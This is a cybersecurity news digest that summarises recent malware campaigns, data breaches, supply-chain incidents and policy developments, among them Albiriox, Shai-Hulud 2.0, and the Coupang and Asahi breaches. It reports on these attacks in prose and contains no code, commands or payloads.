Daily Brief

Albiriox, a new Android malware, is offered as a malware-as-a-service (MaaS) targeting over 400 applications, including banking and financial platforms, for on-device fraud and screen manipulation. The malware employs social engineering tactics and packing techniques to evade detection, distributing its payload through dropper applications mimicking legitimate software updates. Evidence suggests the malware's developers are Russian-speaking, with recruitment initially limited before expanding to a broader MaaS model. Albiriox uses Virtual Network Computing (VNC) and Android accessibility services to control infected devices, bypassing security measures like FLAG_SECURE protection. The malware's capabilities include credential theft through overlay attacks and remote device control, posing significant risks to financial institutions and their customers. Initial campaigns have specifically targeted Austrian users with fake app listings and SMS lures, exploiting German-language content to enhance credibility. The emergence of Albiriox reflects a growing trend in the democratization of sophisticated cybercrime tools, increasing the threat landscape for mobile users globally.

Tomiris, a threat actor, has targeted foreign ministries and government entities in Russia using public services like Telegram and Discord for command-and-control operations. This tactic aims to disguise malicious traffic as legitimate service activity, complicating detection by security tools. Over 50% of spear-phishing emails used Russian names and text, indicating a focus on Russian-speaking targets, with additional campaigns in Central Asian countries. Attacks utilize reverse shells, custom implants, and open-source C2 frameworks to facilitate post-exploitation, enhancing operational flexibility. Tomiris is linked to the Kazakhstan-based threat actor Storm-0473, with overlaps identified with other threat clusters such as Cavalry Werewolf and Silent Lynx. Phishing emails deliver malicious RAR files containing executables that drop reverse shells, modify Windows Registry, and ensure persistence. The campaign's evolution reflects a focus on stealth, persistence, and strategic targeting of high-value political and diplomatic infrastructure.

South Korean authorities are investigating a data breach involving over 30 million customer records from e-commerce giant Coupang, impacting more than half of the country's population. Initially, the breach was thought to affect only 4,600 individuals, but new estimates reveal a far larger scope, including names, email addresses, and physical addresses. The breach raises significant concerns regarding data security practices within Coupang and the e-commerce sector at large, prompting calls for enhanced protective measures. Authorities have yet to disclose the breach's origin, but the scale suggests potential vulnerabilities in Coupang's data management and security protocols. The incident underscores the critical need for robust cybersecurity frameworks to protect sensitive customer information in the digital marketplace. This breach may lead to increased regulatory scrutiny and potential financial penalties for Coupang, impacting its operational and reputational standing. Businesses are reminded of the importance of regular security audits and updates to safeguard against unauthorized data access and potential breaches.

Switzerland's Conference of Data Protection Officers advises public bodies to avoid SaaS and hyperscale cloud services, citing insufficient end-to-end encryption and potential data access by providers. Concerns are raised over the US CLOUD Act, which could expose sensitive Swiss data to foreign access, undermining confidentiality obligations. The resolution criticizes the unilateral amendment of terms by SaaS providers, which could weaken security and privacy measures. Microsoft 365 is specifically mentioned as a service unsuitable for handling sensitive Swiss government data. Security engineer Luke Marshall's GitLab scan uncovered 17,000 live secrets, including thousands of credentials for major cloud services, highlighting significant repository security risks. Strava's updated terms of service warn users about geolocation risks, particularly for those in sensitive roles, following revelations of military and security personnel locations. Leaked documents analyzed by Nariman Gharib reveal Iran's Charming Kitten group's involvement in espionage and assassination operations, emphasizing its growing sophistication. Reports suggest the Israeli military may restrict Android smartphone use among top officials to minimize surveillance threats, opting for iOS devices instead.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2021-26829 to its Known Exploited Vulnerabilities catalog, indicating active exploitation of this cross-site scripting flaw. Affecting OpenPLC ScadaBR on Windows and Linux, the vulnerability allows attackers to manipulate system settings and deface interfaces, posing risks to industrial control systems. A pro-Russian hacktivist group, TwoNet, exploited the flaw in a honeypot simulating a water treatment facility, demonstrating the potential for rapid operational disruption. Federal Civilian Executive Branch agencies must implement necessary patches by December 19, 2025, to mitigate risks associated with this vulnerability. TwoNet, initially known for DDoS attacks, has expanded its activities to include industrial system targeting, doxxing, and ransomware services, raising the threat profile. VulnCheck reported a long-running OAST endpoint on Google Cloud, indicating a sustained exploit operation with significant activity focused on Brazil. The use of legitimate internet services like Google Cloud by attackers complicates detection efforts, as they blend malicious activity with normal network traffic. This incident underscores the importance of timely patch management and monitoring of industrial control systems to prevent exploitation of known vulnerabilities.

Asahi Group Holdings, Japan's leading beer producer, confirmed a data breach affecting up to 1.9 million individuals, compromising personal information like names, addresses, and emails. The breach, initially disclosed in September, forced Asahi to halt production and shipping operations due to a ransomware attack by the Qilin group. Qilin ransomware operators claimed responsibility, alleging possession of 27GB of Asahi's data, with proof shared on their data leak site. Affected data varies by category, with customer data including contact details and employee data also containing birth dates; no payment card information was compromised. Asahi has established a dedicated contact line for affected individuals and is actively restoring systems while resuming shipments in stages. CEO Atsushi Katsuki announced ongoing efforts to enhance security measures, including network control improvements, threat detection upgrades, and revised business continuity plans. The breach underscores the critical need for robust cybersecurity frameworks in protecting sensitive data and ensuring operational resilience.

A 44-year-old Australian was sentenced to over seven years for operating an "evil twin" WiFi network to steal data from travelers during flights and at airports. The individual used a WiFi Pineapple device to mimic legitimate airport networks, directing users to phishing pages to capture social media credentials. Thousands of intimate images and personal credentials were found on seized devices, highlighting the extensive nature of the data theft. After authorities confiscated his equipment, the man attempted to delete evidence and accessed confidential information from his employer's laptop. The Australian Federal Police warned the public about the dangers of free WiFi, recommending VPNs and caution with captive portals. This case underscores the potential risks of public WiFi networks and the importance of cybersecurity awareness among travelers. Despite their rarity, "evil twin" attacks pose significant privacy threats, necessitating vigilance in public spaces.

A security engineer discovered over 17,000 exposed secrets across 5.6 million public GitLab repositories, affecting more than 2,800 unique domains. The engineer employed TruffleHog, an open-source tool, to identify sensitive credentials like API keys, passwords, and tokens within the repositories. The scan revealed a significant presence of Google Cloud Platform credentials, followed by MongoDB keys, Telegram bot tokens, and OpenAI keys. The process utilized GitLab's public API and AWS services, completing the scan in just over 24 hours at a cost of $770. The researcher responsibly disclosed the findings to affected parties using automated notifications, resulting in multiple bug bounties totaling $9,000. Despite many organizations revoking their exposed secrets, some remain vulnerable, underscoring ongoing risks in secrets management. Historical data from the scan indicates that most leaked secrets are from post-2018, though some date back to 2009 and are still valid. This incident highlights the critical need for robust secrets management practices and proactive security measures in software development environments.

PostHog experienced its largest security incident with the Shai-Hulud 2.0 worm, impacting its JavaScript SDKs and developer credentials. The worm exploited an automation flaw in the CI/CD workflow, allowing malicious pull requests to execute with elevated privileges. Affected packages, including those from Zapier and Postman, led to the compromise of over 25,000 developers' secrets in three days. The malware leveraged a pre-install script to exfiltrate credentials to public GitHub repositories, facilitating further malicious package releases. PostHog responded by revoking compromised tokens, removing malicious packages, and implementing a "trusted publisher" model for npm releases. The incident highlights the critical need for secure CI/CD configurations and cautious privilege management in automated workflows. Organizations are urged to review their CI/CD practices to prevent similar vulnerabilities from being exploited by malware campaigns.

ReversingLabs identified vulnerabilities in legacy Python packages, risking supply chain attacks via domain takeover on the Python Package Index (PyPI). The vulnerability stems from outdated bootstrap scripts in packages like tornado, pypiserver, and slapos.core, accessing a domain now available for sale. The scripts automate library downloads and installations, fetching from python-distribute[.]org, a domain that could be weaponized by attackers. Despite some packages removing the risky scripts, slapos.core and Tornado still include the vulnerable code, posing ongoing risks. The scripts, written in Python 2, are not automatically executed, but their presence creates an exploitable attack surface. Historical context shows similar domain takeover incidents, such as the npm package fsevents, emphasizing the need for vigilant package management. HelixGuard's recent discovery of a malicious PyPI package further underscores the critical nature of securing software supply chains.

North Korean threat actors have deployed 197 malicious npm packages, spreading an updated OtterCookie malware variant, downloaded over 31,000 times, targeting JavaScript and crypto-centric workflows. The malware, combining features of BeaverTail and previous OtterCookie versions, evades detection, profiles systems, and establishes a command-and-control channel for remote access and data theft. Attackers use fake job interviews to deceive victims into running Node.js applications, leading to malware infections, as documented by Cisco Talos in a case involving a Sri Lanka-based organization. The campaign leverages a hard-coded Vercel URL to fetch the OtterCookie payload from a GitHub repository, with the GitHub account now inaccessible. Fake assessment-themed websites deliver GolangGhost malware under the guise of fixing technical issues, employing ClickFix-style instructions for distribution. GolangGhost achieves persistence on macOS via LaunchAgent scripts, capturing sensitive information through decoy applications mimicking Chrome prompts. This campaign diverges from other DPRK schemes by targeting individuals through fraudulent recruiting processes, highlighting a sophisticated approach to cyber espionage.

The French Football Federation (FFF) experienced a data breach via a compromised account accessing administrative management software used by football clubs. Attackers stole personal information, including names, birth details, and contact information of French football club members. In response, the FFF disabled the compromised account, reset all user passwords, and secured the affected systems. The FFF has filed a criminal complaint and notified France's National Cybersecurity Agency (ANSSI) and the National Commission on Informatics and Liberty (CNIL). Members are advised to be cautious of communications requesting sensitive information, as attackers may attempt phishing scams. The FFF is enhancing its security measures to address the growing threat landscape and protect entrusted data. This incident follows another recent breach affecting the French social security service, highlighting a trend of increasing cyberattacks in France.

British telecommunications company Brsk confirmed a data breach affecting over 230,000 customer records, with data being auctioned on a cybercrime forum. The compromised data includes full names, email and home addresses, phone numbers, and indicators of vulnerability status, although no financial or login credentials were accessed. Brsk is providing affected customers with 12 months of free personal, financial, and web-monitoring services through Experian as a precautionary measure. The breach has been reported to the Information Commissioner's Office, police, and relevant regulatory bodies, with specialist security partners engaged for investigation. The incident did not impact Brsk's core network or broadband services, ensuring continuity of operations for its 140,000 registered customers. This breach places Brsk alongside other UK telcos like Colt and ICUK, which have faced cybersecurity challenges this year, highlighting the sector's ongoing vulnerabilities. The company's swift response and transparency aim to mitigate customer concerns and reinforce trust in their security measures.

GrapheneOS, a mobile operating system, has ceased using OVHcloud servers due to concerns about France's digital privacy stance and potential state access to data. The decision reflects apprehension over France's support for EU legislation potentially mandating backdoors in encryption for state surveillance purposes. OVHcloud's reputation is further challenged by ongoing legal battles in Canada regarding data sovereignty, raising industry-wide concerns. The move by GrapheneOS underscores a broader industry trend of privacy-focused companies reassessing their data hosting strategies in light of national privacy laws. France's position on privacy and data sovereignty is prompting companies to reconsider their operations within the country, impacting business and operational decisions. The situation highlights the complex balance between legal compliance, data sovereignty, and customer trust in the cloud services sector. As privacy debates continue, cloud providers face increasing pressure to ensure data protection aligns with client expectations and legal frameworks.

TryHackMe is addressing criticism for an all-male lineup in its Advent of Cyber event, a 24-day beginner-level cyber training program. The company is collaborating with Eva Benn from Microsoft to recruit female cybersecurity professionals to join the event's helper list. The initial absence of women was attributed to scheduling conflicts and non-responses from female creators, not a lack of effort. Ethical hacker Katie Paxton-Fear confirmed she was approached but unable to participate due to prior commitments. The situation has sparked broader discussions about gender diversity and representation in the cybersecurity industry. Influencers like Caitlin Sarian and Lesley Carhart have criticized the event, pointing to deeper issues of sexism and influencer culture. TryHackMe is actively expanding its roster to include more women, acknowledging the need for better communication and representation.